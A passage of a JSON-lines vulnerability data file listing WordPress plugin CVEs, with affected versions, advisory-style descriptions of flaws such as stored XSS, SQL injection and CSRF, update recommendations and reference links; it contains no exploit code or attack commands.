/04\\\/04\\\/wordpress-work-the-flow-file-upload-vulnerability\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/exploit\\\/unix\\\/webapp\\\/wp_worktheflow_upload\\\/\",\"name\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/exploit\\\/unix\\\/webapp\\\/wp_worktheflow_upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb271cc8-01ec-45eb-9d6f-efc55c7c3923?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb271cc8-01ec-45eb-9d6f-efc55c7c3923?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4876","slug":"ht-mega-for-elementor","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018popover_header_text\u2019 parameter in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e104fa-591a-41e8-af7e-f8b32a199170?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e104fa-591a-41e8-af7e-f8b32a199170?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_popover.php#L891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_popover.php#L891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9663","slug":"cyan-backup","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The CYAN Backup WordPress plugin before 2.5.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dbd0927-f245-4202-b96b-e55f36a8bb30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dbd0927-f245-4202-b96b-e55f36a8bb30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9662","slug":"cyan-backup","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The CYAN Backup WordPress plugin before 2.5.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa6ff7d-c0dc-4118-afe0-587a24c76f12\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa6ff7d-c0dc-4118-afe0-587a24c76f12\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4875","slug":"ht-mega-for-elementor","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd3868a-d741-42b4-bc7f-6fb5d33bb71b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdd3868a-d741-42b4-bc7f-6fb5d33bb71b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/ht-mega-for-elementor\\\/trunk\\\/admin\\\/include\\\/class.dynamic-notice.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8420","slug":"request-a-quote","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The Request a Quote Form plugin for WordPress is vulnerable to Remote Code Execution in version less than, or equal to, 2.5.2 via the emd_form_builder_lite_pagenum function. This is due to the plugin not properly validating user input before using it as a function name. This makes it possible for unauthenticated attackers to execute code on the server, however, parameters can not be passed to the functions called.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338854%40request-a-quote&new=3338854%40request-a-quote&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338854%40request-a-quote&new=3338854%40request-a-quote&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/601aa2b5-aeac-49bc-960d-4b4ff83e9229?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/601aa2b5-aeac-49bc-960d-4b4ff83e9229?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4373","slug":"better-search","versionEndExcluding":"2.5.3","description":"The Better Search plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to import settings via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6c595-dad2-4abc-8187-ed72355273b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6c595-dad2-4abc-8187-ed72355273b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473344\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5522","slug":"html5-video-player","versionImpact":"2.5.26","versionEndExcluding":"2.5.27","description":"The HTML5 Video Player  WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","recommendation":"Update to version 2.5.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc76ef95-a2a9-4185-8ed9-1059097a506a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc76ef95-a2a9-4185-8ed9-1059097a506a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1061","slug":"UNKNOWN-CVE-2023-6485-1","versionImpact":"2.5.24","versionEndExcluding":"2.5.25","description":"The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the \u00a0'get_view' function.\n","recommendation":"Update to version 2.5.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-02\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-02\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34368","slug":"kanban","versionEndExcluding":"2.5.21","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Kanban for WordPress Kanban Boards for WordPress plugin <=\u00a02.5.20 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0873","slug":"kanban","versionEndExcluding":"2.5.21","description":"The Kanban Boards for WordPress plugin before 2.5.21 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8816d4c1-9e8e-4b6f-a36a-10a98a7ccfcd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8816d4c1-9e8e-4b6f-a36a-10a98a7ccfcd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1528","slug":"search-filter-pro","versionImpact":"2.5.19","versionEndExcluding":"2.5.20","description":"The Search & Filter Pro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_meta_values' function in all versions up to, and including, 2.5.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the values of arbitrary post meta.","recommendation":"Update to version 2.5.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/searchandfilter.com\\\/search-filter-2-5-20-security-release\\\/\",\"name\":\"https:\\\/\\\/searchandfilter.com\\\/search-filter-2-5-20-security-release\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47adb5fe-534f-48a9-81a3-883e1d2cda7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47adb5fe-534f-48a9-81a3-883e1d2cda7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11585","slug":"wp-hide-security-enhancer","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The WP Hide & Security Enhancer plugin for WordPress is vulnerable to arbitrary file contents deletion due to a missing authorization and insufficient file path validation in the file-process.php in all versions up to, and including, 2.5.1. This makes it possible for unauthenticated attackers to delete the contents of arbitrary files on the server, which can break the site or lead to data loss.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-security-enhancer\\\/tags\\\/2.5.1\\\/router\\\/file-process.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-security-enhancer\\\/tags\\\/2.5.1\\\/router\\\/file-process.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4238","slug":"prevent-file-access","versionEndExcluding":"2.5.2","description":"The Prevent files \/ folders access WordPress plugin before 2.5.2 does not validate files to be uploaded, which could allow attackers to upload arbitrary files such as PHP on the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53816136-4b1a-4b7d-b73b-08a90c2a638f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53816136-4b1a-4b7d-b73b-08a90c2a638f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6254","slug":"brizy","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on form submissions. This makes it possible for unauthenticated attackers to submit forms intended for public use as another user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. On sites where unfiltered_html is enabled, this can lead to the admin unknowingly adding a Stored Cross-Site Scripting payload.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75ec04f1-8bea-4514-b1d0-da5b305219d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75ec04f1-8bea-4514-b1d0-da5b305219d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3129495%40brizy%2Ftrunk&old=3125955%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3129495%40brizy%2Ftrunk&old=3125955%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13540","slug":"byconsole-woo-order-delivery-time","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The WooODT Lite \u2013 Delivery & pickup date time location for WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.5.1. This is due the \/inc\/bycwooodt_get_all_orders.php file being publicly accessible and generating a publicly visible error message. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/byconsole-woo-order-delivery-time\\\/trunk\\\/inc\\\/bycwooodt_get_all_orders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/byconsole-woo-order-delivery-time\\\/trunk\\\/inc\\\/bycwooodt_get_all_orders.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4158f6ff-8e0f-4531-8c94-f59220d6fea6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4158f6ff-8e0f-4531-8c94-f59220d6fea6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5181","slug":"wp-discord-invite","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The WP Discord Invite WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/564ad2b0-6ba6-4415-98d7-8d41bc1c3d44\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/564ad2b0-6ba6-4415-98d7-8d41bc1c3d44\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5093","slug":"responsive-lightbox","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The Responsive Lightbox & Gallery WordPress plugin before 2.5.2 use the Swipebox library which does not validate and escape title attributes before outputting them back in a page\/post where used, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1862b4a6-5570-48a4-9b09-f9659eb0e9e3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2684","slug":"file-renaming-on-upload","versionEndExcluding":"2.5.2","description":"The File Renaming on Upload WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42b1f017-c497-4825-b12a-8dce3e108a55\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42b1f017-c497-4825-b12a-8dce3e108a55\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2294","slug":"kubio","versionImpact":"2.5.1","versionEndExcluding":"2.5.2","description":"The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kubio\\\/tags\\\/2.5.1\\\/lib\\\/integrations\\\/third-party-themes\\\/editor-hooks.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kubio\\\/tags\\\/2.5.1\\\/lib\\\/integrations\\\/third-party-themes\\\/editor-hooks.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fb44c6e-520e-4a9f-9987-8b770feb710d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fb44c6e-520e-4a9f-9987-8b770feb710d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36742","slug":"custom-field-template","versionEndExcluding":"2.5.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on the edit_meta_value() function. This makes it possible for unauthenticated attackers to edit meta field values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3444c4b0-4619-482f-8313-d3006aa1e845?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3444c4b0-4619-482f-8313-d3006aa1e845?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368204%40custom-field-template&new=2368204%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368204%40custom-field-template&new=2368204%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6485","slug":"html5-video-player","versionImpact":"2.5.18","versionEndExcluding":"2.5.19","description":"The Html5 Video Player WordPress plugin before 2.5.19 does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins","recommendation":"Update to version 2.5.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759b3866-c619-42cc-94a8-0af6d199cc81\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759b3866-c619-42cc-94a8-0af6d199cc81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6481","slug":"search-filter-pro","versionImpact":"2.5.17","versionEndExcluding":"2.5.18","description":"The Search & Filter Pro WordPress plugin before 2.5.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53357868-2bcb-48eb-8abd-83186ff8d027\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53357868-2bcb-48eb-8abd-83186ff8d027\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26017","slug":"job-postings","versionEndExcluding":"2.5.11","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in BlueGlass Jobs for WordPress plugin <=\u00a02.5.10.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4980","slug":"wpkoi-templates-for-elementor","versionImpact":"2.5.9","versionEndExcluding":"2.5.11","description":"The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'id', 'mixColor', 'backgroundColor', 'saveInCookies', and 'autoMatchOsTheme' parameters in all versions up to, and including, 2.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6054a885-e67a-4731-93ea-64d7f90d9ea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6054a885-e67a-4731-93ea-64d7f90d9ea8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/advanced-heading\\\/advanced-heading.php#L626\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/advanced-heading\\\/advanced-heading.php#L626\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/qr-code\\\/qr-code.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/qr-code\\\/qr-code.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/darkmode\\\/darkmode.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpkoi-templates-for-elementor\\\/trunk\\\/elements\\\/elements\\\/darkmode\\\/darkmode.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088306\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088306\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-44743","slug":"job-postings","versionEndExcluding":"2.5.11","description":"Auth. (author+) Stored Cross-Site Scripting (XSS) vulnerability in BlueGlass Jobs for WordPress plugin <=\u00a02.5.10.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-auth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/job-postings\\\/wordpress-jobs-for-wordpress-plugin-2-5-10-2-auth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12121","slug":"broken-link-finder","versionImpact":"2.5.0","versionEndExcluding":"2.5.1","description":"The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 2.5.1, or a newer patched 